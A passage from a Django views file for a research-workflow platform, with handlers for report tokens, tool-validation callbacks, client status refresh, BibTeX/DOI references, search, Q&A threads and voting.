if not uuid_is_valid(token):
return fail('bad token format')
status_received = kwargs.get('status', None)
if not status_received:
return fail('Could not find status field')
status_fields = ReportToken.parse_response_status(status_received)
#if not status_received in ReportToken.STATUS_CHOICES:
if status_fields is None:
return fail('Unknown status: {}'.format(status_received))
#Get the ReportToken
try:
old_report_token = ReportToken.objects.get(token=token)
except ObjectDoesNotExist as e:
return fail('Could not find entry to this token')
if not old_report_token.active:
return fail('This token has expired')
# Deactivate it
old_report_token.active = False
old_report_token.save()
# Get the report
report_obj = old_report_token.report_related.first()
# Save the new status and return a new token
new_report_token = ReportToken(status=status_received, active=True) # Duplicate code
new_report_token.save()
report_obj.tokens.add(new_report_token)
report_obj.save()
#print ('OLD STATUS:', old_report_token.status)
#print ('NEW STATUS:', new_report_token.status)
return success({'token': str(new_report_token.token)})
### END OF WORKFLOWS ###
### START OF VALIDATION CALLBACK ###
@has_data
def tool_validation_status(request, **kwargs):
'''
Called from the refresh button on Tool validation
'''
tool_argument = kwargs['tool']
tool = Tool.objects.get(**tool_argument)
# toolvalidations = ToolValidations.get()
#print ('TOOL VALIDATION STATUS:')
ret = {
'validation_status': tool.last_validation.validation_status if tool.last_validation else 'Unvalidated',
'validation_created_at': datetime_to_str(tool.last_validation.created_at) if tool.last_validation else None,
'stderr':tool.last_validation.stderr if tool.last_validation else None,
'stdout':tool.last_validation.stdout if tool.last_validation else None,
'errcode':tool.last_validation.errcode if tool.last_validation else None,
}
#print (ret)
return success(ret)
@has_data
def tool_info_validation_queued(request, **kwargs):
'''
This is called from angular in order to connect the controller id with the database tool
'''
if not 'payload' in kwargs:
return fail('payload was not found on callback')
payload = kwargs['payload']
assert payload['status'] == 'Queued'
tool = Tool.objects.get(**payload['tool'])
this_id = payload['id']
tv = ToolValidations(tool=tool, task_id=this_id, validation_status='Queued')
tv.save()
#print (f'Saved ToolValidation Queued with task_id: {this_id}')
tool.last_validation = tv
tool.save()
return success({'last_validation': datetime_to_str(tv.created_at)})
@csrf_exempt
@has_data
def callback(request, **kwargs):
'''
Funtion called by conntroller.py
'''
#print("--------------- REQUEST FROM CONTROLLER ------------------")
#print(kwargs)
remote_address = request.META['REMOTE_ADDR']
#print (f'Callback from: {remote_address}')
if not remote_address in ['139.91.190.79']:
return fail(f'Received callback from unknown remote address: {remote_address}')
if not 'payload' in kwargs:
return fail('payload was not found on callback')
payload = kwargs['payload']
if not 'status' in payload:
return fail('status was not found on payload')
status = payload['status']
if not status in ['Running', 'Validated', 'Failed']:
return fail(f'Unknown status: {status}')
if not 'id' in payload:
return fail('id was not found on payload')
this_id = payload['id']
# Get the stdout stdderr and errorcode
stdout = payload.get('stdout', None)
stderr = payload.get('stderr', None)
errcode = payload.get('errcode', None)
#print(stdout)
# Get the tool referring to this task_id
tool = ToolValidations.get_tool_from_task_id(this_id)
if tool is None:
return fail(f'Could not find tool with task_id={this_id}')
# Create new ToolValidations
# If stdout is emty , stderr and errcode are empty
# If status is Queued or Running set this three None
tv = ToolValidations(tool=tool, task_id=this_id, validation_status=status, stdout= stdout, stderr= stderr, errcode= errcode)
tv.save()
#print (f'CALLBACK: Tool: {tool.name}/{tool.version}/{tool.edit} id: {this_id} status: {status}')
# Assign tv to tool
tool.last_validation = tv
tool.save()
#print (f'CALLBACK: Tool: {tool.name}/{tool.version}/{tool.edit} id: {this_id} status: {status}')
return success()
def tools_show_stdout(request, tools_info_name, tools_info_version, tools_info_edit):
'''
URL :
path(r'tool_stdout/[\\w]+/[\\w\\.]+/[\\d]+/', views.tools_show_stdout), # Show stdout of tool
'''
#print (tools_info_name, tools_info_version, tools_info_edit)
tool_repr = Tool.get_repr(tools_info_name, tools_info_version, tools_info_edit)
try:
tool = Tool.objects.get(name=tools_info_name, version=tools_info_version, edit=int(tools_info_edit))
except ObjectDoesNotExist as e:
return fail(f'Could not find tool: {tool_repr}')
if not tool.last_validation:
return fail(f'Could not find any validation effort for tool: {tool_repr}')
if not tool.last_validation.stdout:
return fail(f'Coud not find stdout on the lst validation efoort of tool: {tool_repr}')
context = {
'html': convert_ansi_to_html(tool.last_validation.stdout)
}
return render(request, 'app/tool_stdout.html', context)
### END OF CALL BACK ###
### REPORTS
def reports_search_2(main_search, request):
'''
Collect all reports from main search.
In contrary to other *_search_2 , we only allow to show reports that belong to the login user!
'''
# Return empty results if user is anonymous or not validated
if request.user.is_anonymous or (not user_is_validated(request)):
return {
'main_search_reports_number': 0,
'reports_search_jstree': [],
}
obc_user = OBC_user.objects.get(user=request.user)
nice_id_Q = Q(nice_id__contains=main_search)
username_Q = Q(obc_user__user__username__icontains=main_search)
workflow_Q = Q(workflow__name__icontains=main_search)
not_unused = Q(tokens__status = ReportToken.UNUSED)
count_1 = Q(num_tokens = 1)
user_Q = Q(obc_user = obc_user)
# We do not want reports that have only one tokens which is "unused"
results = Report.objects.annotate(num_tokens=Count('tokens')).filter(
user_Q & (nice_id_Q | workflow_Q | username_Q) & (~(not_unused&count_1))
)
# BUILD TREE
reports_search_jstree = []
workflows_in_tree = set()
for report in results:
# Add the workflow
workflow = report.workflow
if not workflow in workflows_in_tree:
workflows_in_tree.add(workflow)
to_add = {
'data': {'name': workflow.name, 'edit': workflow.edit, 'type': 'workflow'},
'text': workflow_text_jstree(workflow) + jstree_icon_html('workflows'),
'id': workflow_id_jstree(workflow, g['SEARCH_REPORT_TREE_ID']),
'parent': workflow_id_jstree(workflow.forked_from, g['SEARCH_REPORT_TREE_ID']) if workflow.forked_from else '#',
'state': { 'opened': True},
}
reports_search_jstree.append(to_add)
# Add the report
to_add = {
'data': {'run': report.nice_id, 'type': 'report'},
'text': report.nice_id + jstree_icon_html('reports'),
'id': report_id_jstree(report, g['SEARCH_REPORT_TREE_ID']),
'parent': workflow_id_jstree(workflow, g['SEARCH_REPORT_TREE_ID']),
'state': { 'opened': True},
}
reports_search_jstree.append(to_add)
ret = {
'main_search_reports_number': results.count(),
'reports_search_jstree': reports_search_jstree,
}
return ret
@has_data
def reports_search_3(request, **kwargs):
'''
Search for an individual report
'''
if request.user.is_anonymous or (not user_is_validated(request)):
return fail('You are either anonymous or your email is not validated. You do not have access to reports.')
obc_user = OBC_user.objects.get(user=request.user)
run = kwargs['run']
try:
report = Report.objects.get(nice_id=run, obc_user=obc_user)
except ObjectDoesNotExist as e:
return fail('Could not find report, or you do not have access.')
workflow = report.workflow
#Get all tokens
tokens = [{
'status': token.status,
'created_at': datetime_to_str(token.created_at),
'token': str(token.token),
#'node_anim_id': create_node_anim_id(token.status), # the parameter passed to nodeAnimation
'node_anim_params': ReportToken.parse_response_status(token.status), # the parameter passed to nodeAnimation_public
} for token in report.tokens.all().order_by('created_at') if token.status != ReportToken.UNUSED]
# Check if ReportToken.parse_response_status successfully parsed tokens
# This is a sanity check
for token in tokens:
if token['node_anim_params'] is None:
return fail('Error 8915: could not parse token: {}'.format(token['status']))
ret = {
'report_workflow_name': workflow.name,
'report_workflow_edit': workflow.edit,
'report_username': report.obc_user.user.username,
'report_created_at': datetime_to_str(report.created_at),
'report_tokens': tokens,
'report_client': bool(report.client),
'report_url': report.url, # The url with the results
'report_log_url': report.log_url, # The url with the logs
'report_visualization_url': report.visualization_url, # The url for monitoring of the execution progress (i.e. from airflow)
'report_monitor_url': report.monitor_url,
'report_client_status': report.client_status,
'workflow' : simplejson.loads(workflow.workflow),
}
return success(ret)
@has_data
def reports_refresh(request, **kwargs):
'''
path: report_refresh/
Get an update for a report
report_workflow_action : 1 = refresh , 2 = pause , 3 = resume
'''
report_workflow_name = kwargs['report_workflow_name']
report_workflow_edit = int(kwargs['report_workflow_edit'])
nice_id = kwargs['report_workflow_run']
report_workflow_action = kwargs['report_workflow_action']
# Get the report
report = Report.objects.get(nice_id=nice_id)
previous_status = report.client_status
if request.user.is_anonymous:
return fail('Please log in to update the status of a Report')
# Get this user
obc_user = OBC_user.objects.get(user=request.user)
if obc_user != report.obc_user:
return fail('Cannot edit a report of another user.')
if not report.client:
if report_workflow_action == 4:
# Deleting a report that has not been associated with any client.
# Just delete it..
report.delete()
return success()
# Get the url of the client
client_url = report.client.client
if report_workflow_action == 1:
# Refresh
# Get the url to check status
url = g['create_client_check_status_url'](client_url, nice_id)
#print ('CHECK STATUS URL:')
#print (url)
elif report_workflow_action == 2:
# Pause
url = g['create_client_pause_url'](client_url, nice_id)
#print ('PAUSE URL:')
#print (url)
elif report_workflow_action == 3:
# Resume
url = g['create_client_resume_url'](client_url, nice_id)
#print ('RESUME URL:')
#print (url)
elif report_workflow_action == 4:
# Delete
url = g['create_client_abort_url'](client_url, nice_id)
#print ('ABORT URL:')
#print (url)
else:
return fail('Error 5821: {}'.format(str(report_workflow_action)))
try:
r = requests.get(url)
except requests.exceptions.ConnectionError as e:
return fail('Could not establish a connection with client')
if not r.ok:
return fail('Could not send to URL: {} . Error code: {}'.format(client_url, r.status_code))
data_from_client = r.json()
#print ('Data from client:')
#print (data_from_client)
# {"error": "Dag id mitsos not found"}
if report_workflow_action == 1: # refresh
if type(data_from_client) is dict:
if 'error' in data_from_client:
if 'not found' in data_from_client['error']:
status = 'NOT FOUND'
else:
return fail('Error: 1111')
else:
return fail('Error: 1112')
if not type(data_from_client) is list:
return fail('Error: 1113')
if len(data_from_client) != 1:
return fail('Error: 1114')
if not type(data_from_client[0]) is dict:
return fail('Error: 1115')
if not 'state' in data_from_client[0]:
return fail('Error: 1116')
if data_from_client[0]['state'] == 'running':
status = 'RUNNING'
elif data_from_client[0]['state'] == 'failed':
status = 'FAILED'
elif data_from_client[0]['state'] == 'success':
status = 'SUCCESS'
elif data_from_client[0]['state'] == 'paused':
status = 'PAUSED'
else:
return fail('Unknown status:', data_from_client[0]['state'])
elif report_workflow_action in [2, 3]: # 2 = pause , 3 = resume
if not type(data_from_client) is dict:
return fail('Error: 1119')
if not 'response' in data_from_client:
return fail('Error: 1120')
if data_from_client['response'] != 'ok':
return fail('Error 1121')
if report_workflow_action == 2:
status = 'PAUSE_SUBMITTED'
elif report_workflow_action == 3:
status = 'RESUME_SUBMITTED'
else:
return fail('Error 1122')
elif report_workflow_action == 4:
if not type(data_from_client) is dict:
return fail('Error: 1123')
if not 'status' in data_from_client:
return fail('Error 1124')
if data_from_client['status'] != 'success':
return fail('Client responded with an error message: {}'.format(data_from_client['status']))
# Delete it..
report.delete()
return success()
# Update report object
report.client_status = status
report.save()
# If we finished, then create the URL that contains the report
report_url = None
log_url = None
if status == 'SUCCESS':
report_url = g['create_client_download_report_url'](client_url, nice_id)
if status in ['SUCCESS', 'FAILED']:
log_url = g['create_client_download_log_url'](client_url, nice_id)
report.url = report_url
report.log_url = log_url
report.save()
ret = {
'report_url': report_url,
'report_log_url': log_url,
'report_client_status': status,
}
return success(ret)
### END OF REPORTS
### REFERENCES
def bibtex_to_html(content):
'''
Convert bibtex to html
Adapted from: http://pybtex-docutils.readthedocs.io/en/latest/quickstart.html#overview
'''
# Ideally we could have these variables set only once,
# But it is not allowed to have multiuple entries.
pybtex_style = pybtex.plugin.find_plugin('pybtex.style.formatting', 'plain')()
pybtex_html_backend = pybtex.plugin.find_plugin('pybtex.backends', 'html')()
pybtex_parser = pybtex.database.input.bibtex.Parser()
try:
data = pybtex_parser.parse_stream(six.StringIO(content))
except pybtex.scanner.TokenRequired as e:
return False, 'Error during parsing BIBTEX: ' + str(e), None
if len(data.entries) == 0:
return False, 'Could not find any BIBTEX entry', None
if len(data.entries) > 1:
return False, 'Detected more than one entries in BIBTEX. Only one is allowed', None
fields = {}
for entry_key, entry_value in data.entries.items():
fields[entry_key] = {}
for field_key, field_value in entry_value.fields.items():
fields[entry_key][field_key] = field_value
data_formatted = pybtex_style.format_entries(six.itervalues(data.entries))
output = io.StringIO()
try:
pybtex_html_backend.write_to_stream(data_formatted, output)
except pybtex.style.template.FieldIsMissing as e:
return False, str(e), None # This DOI for example: 10.1038/nature09298 . Error: missing author in 2010.
html = output.getvalue()
html_s = html.split('\n')
html_s = html_s[9:-2]
new_html = '\n'.join(html_s).replace('<dd>', '').replace('</dd>', '')
return True, new_html, fields
def get_fields_from_bibtex_fields(fields, str_response):
'''
Reads fields from a bibtex formated in html
TEST 1
@article{Barrangou_2007,
doi = {10.1126/science.1138140},
url = {https://doi.org/10.1126%2Fscience.1138140},
year = 2007,
month = {mar},
publisher = {American Association for the Advancement of Science ({AAAS})},
volume = {315},
number = {5819},
pages = {1709--1712},
author = {R. Barrangou and C. Fremaux and H. Deveau and M. Richards and P. Boyaval and S. Moineau and D. A. Romero and P. Horvath},
title = {{CRISPR} Provides Acquired Resistance Against Viruses in Prokaryotes},
journal = {Science}
}
'''
name = list(fields.keys())[0] # first key
title = fields[name].get('title', '')
# check if it is enclised in brackets {title}
# Remove '{' and '}' from tite
#m = re.match(r'{(.*)}', title)
#if m:
# title = m.group(1)
title = title.replace('{', '').replace('}', '')
doi = fields[name].get('doi', '')
if not doi:
doi = fields[name].get('DOI', '')
url = fields[name].get('url', '')
if not url:
url = fields[name].get('URL', '')
ret = {
'references_name': name,
'references_formatted': str_response,
'references_title': title,
'references_doi': doi,
'references_url': url,
}
return ret
@has_data
def references_generate(request, **kwargs):
'''
Generate HTML reference from bibtex
'''
references_BIBTEX = kwargs['references_BIBTEX']
suc, str_response, fields = bibtex_to_html(references_BIBTEX)
if not suc:
return fail(str_response)
ret = get_fields_from_bibtex_fields(fields, str_response)
return success(ret)
@has_data
def references_process_doi(request, **kwargs):
'''
Generate a BIBTEX from DOI
'''
references_doi = kwargs.get('references_doi', '')
if not references_doi:
return fail('DOI is empty')
doi_url = "http://dx.doi.org/" + references_doi
if not valid_url(doi_url):
return fail('Invalid DOI. Example of valid DOI: 10.1126/science.1138140')
bibtex = resolve_doi(references_doi)
#print ('bibtex:')
#print (bibtex)
if not bibtex:
return fail('Could not get bibliographic information for this DOI')
suc, str_response, fields = bibtex_to_html(bibtex)
if not suc:
return fail('The BIBTEX returned from this doi was invalid: ' + str_response) # This should never happen..
ret = get_fields_from_bibtex_fields(fields, str_response)
ret['references_BIBTEX'] = bibtex
return success(ret)
@has_data
def references_add(request, **kwargs):
'''
Add a new reference
'''
# Check user
if request.user.is_anonymous:
return fail('Please login to create References')
# Check if user is validated
if not user_is_validated(request):
return fail('Please validate your email to create new references ' + validate_toast_button());
references_name = kwargs.get('references_name', '')
if not references_name:
return fail('References Name is required')
if not re.match(r'\w+', references_name):
return fail('Invalid Reference Name. It should contain only letters and numbers')
references_title = kwargs.get('references_title', '')
if not references_title:
return fail('References Title is required')
references_url = kwargs.get('references_url', '')
if not references_url:
return fail('References URL is required')
#Is there a reference with the same url?
url_ref = Reference.objects.filter(url=references_url)
if url_ref.exists():
return fail('A Reference with this URL already exists: {}'.format(url_ref.first().name))
# References are case insensitive!
references_name = references_name.lower()
#Are there any references with this name?
if Reference.objects.filter(name=references_name).exists():
return fail('A Reference with this name already exists')
# Is there a reference with the same SOI?
references_doi = kwargs.get('references_doi', None)
if references_doi:
doi_ref = Reference.objects.filter(doi=references_doi)
if doi_ref.exists():
return fail('A Reference with this DOI already exists: {}'.format(doi_ref.first().name))
# Check bibtex
references_BIBTEX = kwargs.get('references_BIBTEX', '')
reference_fields = []
html = None
if references_BIBTEX:
suc, str_response, fields = bibtex_to_html(references_BIBTEX)
if not suc:
return fail(str_response)
# It succeeded to parse BIBTEX. Get the html
html = str_response
name = list(fields.keys())[0] # first key
#Create (or get) ReferenceFields
reference_fields = [ReferenceField.objects.get_or_create(
key=reference_key,
value=reference_value,
)[0] for reference_key, reference_value in fields[name].items()]
# Create Reference object
reference = Reference(
obc_user = OBC_user.objects.get(user=request.user),
name = references_name,
url = references_url,
title = references_title,
doi = references_doi,
bibtex = references_BIBTEX if references_BIBTEX else None,
html = html,
notes = kwargs.get('references_notes', None),
)
reference.save()
# Add fields from BIBTEX
reference.fields.add(*reference_fields)
reference.save()
ret = {
'references_formatted': html,
'references_created_at': datetime_to_str(reference.created_at),
'references_username': request.user.username,
}
return success(ret)
def references_search_2(
main_search,
):
'''
Collect all references from main search
'''
name_Q = Q(name__icontains=main_search)
html_Q = Q(html__icontains=main_search)
username_Q = Q(obc_user__user__username__icontains=main_search)
results = Reference.objects.filter(name_Q | html_Q | username_Q)
references_search_jstree = []
for result in results:
to_add = {
'data': {'name': result.name},
'text': result.name + jstree_icon_html('references'),
'id': result.name,
'parent': '#',
'state': { 'opened': True},
}
references_search_jstree.append(to_add)
ret = {
'main_search_references_number': results.count(),
'references_search_jstree': references_search_jstree,
}
return ret
def qa_get_root_comment(comment):
'''
Take a comment in a nested thread and get the root comment
'''
if not comment.parent:
return comment
return qa_get_root_comment(comment.parent)
def qa_search_2(main_search):
'''
Collect all Q&A from main search
'''
title_Q = Q(title__icontains=main_search)
comment_Q = Q(comment__icontains=main_search)
username_Q = Q(obc_user__user__username__icontains=main_search)
results = Comment.objects.filter(title_Q | comment_Q | username_Q)
qa_search_tree = []
entries_in_tree = set()
for result in results:
# Get the root message
result_parent = qa_get_root_comment(result)
#Is this on the tree?
if result_parent.pk in entries_in_tree:
# It is already in the tree
continue
else:
entries_in_tree.add(result_parent.pk)
# Remove <a></a> hyperlinks from question answers
# See issue #106
if re.search(r'<a.*a>', result_parent.title):
to_substitute = re.search(r'<a.*a>', result_parent.title).group(0)
substitute_with = re.search(r'>(.*)</a>', re.search(r'<a.*a>', result_parent.title).group(0)).group(1)
result_parent.title = result_parent.title.replace(to_substitute, substitute_with)
to_add = {
'data': {'id': result_parent.pk},
'text': result_parent.title + jstree_icon_html('qas'),
'id': str(result_parent.pk),
'parent': '#',
'state': { 'opened': True},
}
qa_search_tree.append(to_add)
ret = {
'main_search_qa_number': len(qa_search_tree),
'qa_search_jstree': qa_search_tree,
}
return ret
@has_data
def references_search_3(request, **kwargs):
'''
'''
name = kwargs.get('name', '')
try:
reference = Reference.objects.get(name__iexact=name)
except ObjectDoesNotExist as e:
return fail('Could not find Reference') # This should never happen..
ret = {
'references_name': reference.name,
'references_title': reference.title,
'references_url': reference.url,
'references_doi': reference.doi,
'references_notes': reference.notes,
'references_BIBTEX': reference.bibtex,
'references_html': reference.html,
'references_created_at': datetime_to_str(reference.created_at),
'references_username': reference.obc_user.user.username,
}
return success(ret)
### END OF REFERENCES
### SEARCH
@has_data
def all_search_2(request, **kwargs):
'''
Called when there is a key change in main search
'''
main_search = kwargs.get('main_search', '')
main_search_slash_count = main_search.count('/')
# Check for slashes
if main_search_slash_count == 0:
tools_search_name = main_search
tools_search_version = ''
tools_search_edit = ''
workflows_search_name = main_search
workflows_search_edit = ''
elif main_search_slash_count == 1:
tools_search_name, tools_search_version = main_search.split('/')
tools_search_name = tools_search_name.strip()
tools_search_version = tools_search_version.strip()
tools_search_edit = 0 # Do not apply search
workflows_search_name, workflows_search_edit = main_search.split('/')
workflows_search_name = workflows_search_name.strip()
workflows_search_edit = workflows_search_edit.strip()
try:
workflows_search_edit = int(workflows_search_edit)
except ValueError:
workflows_search_edit = 0 # do not apply search on workflow edit
elif main_search_slash_count == 2:
# Practically apply only tool search
tools_search_name, tools_search_version, tools_search_edit = main_search.split('/')
tools_search_name = tools_search_name.strip()
tools_search_version = tools_search_version.strip()
try:
tools_search_edit = int(tools_search_edit)
except ValueError:
tools_search_edit = 0 # Do not apply search no tool edit
workflows_search_name = ''
workflows_search_edit = -1
else:
tools_search_name = ''
tools_search_version = ''
tools_search_edit = -1
workflows_search_name = ''
workflows_search_edit = -1
ret = {}
#Get tools
for key, value in tools_search_2(tools_search_name, tools_search_version, tools_search_edit).items():
ret[key] = value
#Get workflows
for key, value in workflows_search_2(workflows_search_name, workflows_search_edit).items():
ret[key] = value
#Get reports
for key, value in reports_search_2(main_search, request).items():
ret[key] = value
#Get references
for key, value in references_search_2(main_search).items():
ret[key] = value
#Get users
for key, value in users_search_2(main_search).items():
ret[key] = value
# Get QAs
for key, value in qa_search_2(main_search).items():
ret[key] = value
return success(ret)
### END OF SEARCH
### Q&A
@has_data
def qa_add_1(request, **kwargs):
'''
Called from qa_add_1/
'''
qa_title = kwargs.get('qa_title', '')
if not qa_title:
return fail('Title should not be empty')
qa_comment = kwargs.get('qa_comment', '')
if not qa_comment:
return fail('Comment should not be empty')
qa_comment_html = markdown(qa_comment)
if request.user.is_anonymous:
return fail('Please login to post a new question')
user = request.user
# We cannot have the same comment title more than once
if Comment.objects.filter(title__iexact=qa_title).exists():
return fail('A comment with this title already exists!')
#Create a new comment
comment = Comment(
obc_user=OBC_user.objects.get(user=user),
comment=qa_comment,
comment_html = qa_comment_html,
title=qa_title,
parent=None,
upvotes=0,
downvotes=0,
)
comment.save()
ret = {
'id': comment.pk,
'comment_html': qa_comment_html,
}
return success(ret)
def qa_create_thread(comment, obc_user = None):
'''
Recursive
Create the children thread of a comment
'''
ret = []
for child in comment.children.all():
to_add = {
'comment': child.comment,
'comment_html': child.comment_html,
'opinion': child.opinion,
'score': child.upvotes - child.downvotes,
'id': child.pk,
'replying': False,
'voted' : is_comment_updownvoted(obc_user, child),
'children': qa_create_thread(child, obc_user),
'username': child.obc_user.user.username,
'created_at': datetime_to_str(child.created_at),
}
ret.append(to_add)
return ret
@has_data
def qa_search_3(request, **kwargs):
'''
path: qa_search_3/
From angular: Fetch the data from a single Q&A and update the UI
Get a unique Q&A thread
'''
id_ = kwargs.get('qa_id', None)
if not id_:
return fail('Could not find Q&A id')
try:
comment = Comment.objects.get(pk=id_)
except ObjectDoesNotExist as e:
return fail('Could not find comment database object')
# Get obc_user
if request.user.is_anonymous:
obc_user = None
else:
obc_user = OBC_user.objects.get(user=request.user)
ret = {
'qa_title': comment.title,
'qa_comment': comment.comment,
'qa_comment_html': comment.comment_html,
'qa_score': comment.upvotes - comment.downvotes,
'qa_id': comment.pk,
'qa_thread': qa_create_thread(comment, obc_user),
'qa_voted': is_comment_updownvoted(obc_user, comment),
'qa_username': comment.obc_user.user.username,
'qa_created_at': datetime_to_str(comment.created_at),
}
#print (simplejson.dumps(ret, indent=4))
return success(ret)
@has_data
def get_pk_from_root_comment(request, **kwargs):
'''
path: get_pk_from_root_comment/
'''
comment_id = int(kwargs['comment_id'])
pk_type = kwargs['type']
try:
if pk_type == 'tool':
tool = Tool.objects.filter(comment_id=comment_id).first()
pk = tool.id
elif pk_type == 'workflow':
workflow = Workflow.objects.filter(comment_id=comment_id).first()
pk = workflow.id
else:
return fail('ERROR: 2919 . Unknown pk_type: {}'.format(pk_type))
except ObjectDoesNotExist as e:
return fail('Could not find tool or workflow database object')
ret = {
'pk': pk,
}
return success(ret)
@has_data
def gen_qa_search_3(request, **kwargs):
'''
PATH: gen_qa_search_3/
Generic version of qa_search_3
Get a unique Q&A thread
'''
# Get arguments
object_pk = kwargs['object_pk'] # This is the primary key of the tool/workflow
qa_type = kwargs['qa_type']
if qa_type == 'tool':
commentable = Tool.objects.get(pk=object_pk)
elif qa_type == 'workflow':
commentable = Workflow.objects.get(pk=object_pk)
else:
return fail('ERROR: 2918 . Unknown qa_type: {}'.format(qa_type))
# Get obc_user
if request.user.is_anonymous:
obc_user = None
else:
obc_user = OBC_user.objects.get(user=request.user)
# Get the thread of this comment
ret = {
'qa_id': commentable.comment.pk,
'qa_thread': qa_create_thread(commentable.comment, obc_user),
'qa_voted': is_comment_updownvoted(obc_user, commentable.comment),
'qa_score': commentable.comment.upvotes - commentable.comment.downvotes,
'qa_username': commentable.comment.obc_user.user.username,
'qa_created_at': datetime_to_str(commentable.comment.created_at),
}
return success(ret)
@has_data
def qa_add_comment(request, **kwargs):
'''
Add a comment at a Q&A question
'''
if request.user.is_anonymous:
return fail('Please login to add a new comment')
if not user_is_validated(request):
return fail('Please validate your email to add a new comment' + validate_toast_button());
id_ = kwargs.get('qa_id', None)
if id_ is None:
return fail('Could not find Q&A id')
current_comment = kwargs.get('qa_comment', None)
if current_comment is None:
return fail('Could not find Q&A new comment')
elif not current_comment.strip():
return fail('Comment cannot be empty')
current_comment_html = markdown(current_comment)
opinion = kwargs.get('qa_opinion', None)
if not opinion in ['solution', 'note', 'agree', 'disagree']:
return fail('Error 9177. opinion value unknown')
try:
parent_comment = Comment.objects.get(pk=id_)
except ObjectDoesNotExist as e:
return fail('ERROR: 8991. Could not find comment database object')
new_comment = Comment(
obc_user = OBC_user.objects.get(user=request.user),
comment = current_comment,
comment_html = current_comment_html,
opinion = opinion,
parent = parent_comment,
upvotes = 0,
downvotes = 0,
)
new_comment.save()
parent_comment.children.add(new_comment)
parent_comment.save()
ret = {
'comment_html': current_comment_html,
}
return success(ret)
@has_data
def gen_qa_add_comment(request, **kwargs):
'''
PATH: gen_qa_add_comment/
Generic version of the qa_add_comment
Add a comment at a Q&A question
'''
if request.user.is_anonymous:
return fail('Please login to add a new comment')
if not user_is_validated(request):
return fail('Please validate your email to add a new comment ' + validate_toast_button());
comment_pk = kwargs['comment_pk']
object_pk = kwargs['object_pk']
qa_comment = kwargs['qa_comment']
qa_opinion = kwargs['qa_opinion']
qa_type = kwargs['qa_type']
current_comment_html = markdown(qa_comment)
# Get the tool
if qa_type == 'tool':
commentable = Tool.objects.get(pk=object_pk)
elif qa_type == 'workflow':
commentable = Workflow.objects.get(pk=object_pk)
else:
return fail('ERROR: 2918 . Unknown qa_type: {}'.format(qa_type))
# Get the root comment
if comment_pk is None:
root_comment = commentable.comment
else:
root_comment = Comment.objects.get(pk=comment_pk)
new_comment = Comment(
obc_user=OBC_user.objects.get(user=request.user),
comment = qa_comment,
opinion = qa_opinion,
comment_html = current_comment_html,
parent = root_comment,
upvotes = 0,
downvotes = 0,
)
new_comment.save()
root_comment.children.add(new_comment)
root_comment.save()
ret = {
'comment_html': current_comment_html,
}
return success(ret)
def is_comment_updownvoted(obc_user, comment):
'''
Has this user upvoted or downvoted this comment?
'''
if obc_user is None:
return {'up': False, 'down': False}
try:
vote = UpDownCommentVote.objects.get(obc_user=obc_user, comment=comment)
except ObjectDoesNotExist as e:
return {'up': False, 'down': False}
return {'up': vote.upvote, 'down': not vote.upvote}
@has_data
def updownvote_comment(request, **kwargs):
'''
url: updownvote_comment/
'''
if request.user.is_anonymous:
return fail('Please login to upvote/downvote comments')
if not user_is_validated(request):
return fail('Please validate your email to upvote/downvote' + validate_toast_button());
comment_id = int(kwargs['comment_id'])
upvote = kwargs['upvote']
assert upvote in [True, False]
# Get the comment
comment = Comment.objects.get(pk=comment_id)
# Get the user
obc_user = OBC_user.objects.get(user=request.user)
# Check if this is already a vote
try:
vote = UpDownCommentVote.objects.get(obc_user=obc_user, comment=comment)
except ObjectDoesNotExist as e:
#Create the UpDownCommentVote object
vote = UpDownCommentVote(
obc_user = obc_user,
comment = comment,
upvote = upvote,
)
vote.save()
voted = {'up': upvote, 'down': not upvote}
else:
# No exception happened. A vote for this comment already exists
if vote.upvote and upvote:
# You cannot upvote twice!
return fail('Already upvoted')
if (not vote.upvote) and (not upvote): # DeMorgan anyone?
# You cannot downvote twice!
return fail('Already downvoted')
# This post was upvoted and now downvoted from the same user (or vice-versa)!
# Just delete the vote
vote.delete()
voted = {'up': False, 'down': False} # Neither upvoted nor downvoted
#Add the score
if upvote:
comment.upvotes += 1
else:
comment.downvotes += 1
comment.save()
ret = {
'score': comment.upvotes - comment.downvotes,
'voted': voted
}
return success(ret)
@has_data
def updownvote_tool_workflow(request, **kwargs):
'''
Called from $scope.updownvote_tool_workflow
Called when a user hit the buttons for upvote or downvote or a tool or for a workflow
'''
if request.user.is_anonymous:
return fail('Please login to upvote/downvote Research Objects')
if not user_is_validated(request):
return fail('Please validate your email to upvote/downvote' + validate_toast_button());
# Get the user
obc_user = OBC_user.objects.get(user=request.user)
ro = kwargs.get('ro', '')
if not ro:
return fail('Error 1023')
if not ro in ['tool', 'workflow']:
return fail('Error 1026')
ro_obj = kwargs.get('ro_obj', '')
if not ro_obj:
return fail('Error 1024')
upvote = kwargs.get('upvote', '')
if upvote == '':
return fail('Error 1025')
if not upvote in [True, False]:
return fail('Error 1027')
# Get the tool/workflow database object
ro_table = {
'tool': Tool,
'workflow': Workflow,
}[ro]
ro_ud_table = {
'tool': UpDownToolVote,
'workflow': UpDownWorkflowVote,
}[ro]
try:
ro_table_obj = ro_table.objects.get(**ro_obj)
except ObjectDoesNotExist as e:
return fail('Error 1027')
# Check if this user has already upvoted or downvoted this RO
try:
ro_ud_table_obj = ro_ud_table.objects.get(**{
'obc_user': obc_user,
ro: ro_table_obj,
})
except ObjectDoesNotExist as e:
# This user has **not** upvoted or downvoted this RO
pass
else:
# This user has upvoted or downvoted this RO in the past
if ro_ud_table_obj.upvote and upvote:
return fail('You cannot upvote twice')
elif (not ro_ud_table_obj.upvote) and (not upvote):
return fail('You cannot downvote twice')
elif ro_ud_table_obj.upvote and (not upvote):
# Delete upvote vote!
ro_ud_table_obj.delete()
# Update votes
ro_table_obj.upvotes -= 1
ro_table_obj.save()
return success({
'score': ro_table_obj.upvotes-ro_table_obj.downvotes,
'voted': {'up': False, 'down': False},
})
elif (not ro_ud_table_obj.upvote) and upvote:
# Delete downvote vote
ro_ud_table_obj.delete()
ro_table_obj.downvotes -= 1
ro_table_obj.save()
return success({
'score': ro_table_obj.upvotes-ro_table_obj.downvotes,
'voted': {'up': False, 'down': False},
})
#This user has not upvoted or downvoted before this RO
#Create a new vote database object
new_vote_obj = ro_ud_table(**{
'obc_user': obc_user,
ro: ro_table_obj,
'upvote': upvote,
})
new_vote_obj.save()
# Change the upvote / downvote counter of this research object
if upvote:
ro_table_obj.upvotes += 1
else:
ro_table_obj.downvotes += 1
ro_table_obj.save()
ret = {
'score': ro_table_obj.upvotes-ro_table_obj.downvotes,
'voted': {'up': upvote, 'down': not upvote},
}
return success(ret)
@has_data
def markdown_preview(request, **kwargs):
text = kwargs.get('text', '')
if not type(text) is str:
